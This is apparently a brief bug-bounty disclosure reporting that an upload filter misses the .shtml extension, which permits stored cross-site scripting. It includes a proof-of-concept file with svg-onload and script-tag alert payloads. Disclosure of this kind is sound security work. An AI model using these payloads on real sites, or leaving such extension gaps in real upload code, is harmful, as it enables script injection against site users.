Hi. This is a bypass to the report in https://huntr.dev/bounties/df347aa9-ed9b-4f75-af99-c83b8aad3bcf/ . It fails to check for files with the extension .shtml
which leads to stored xss
// poc.shtml
<html>
<body>
<h1>adsasdadsdsa</h1>
<svg/onload=alert()>
<script>alert(1)</script>
</body>>
</html>>
Stored Xss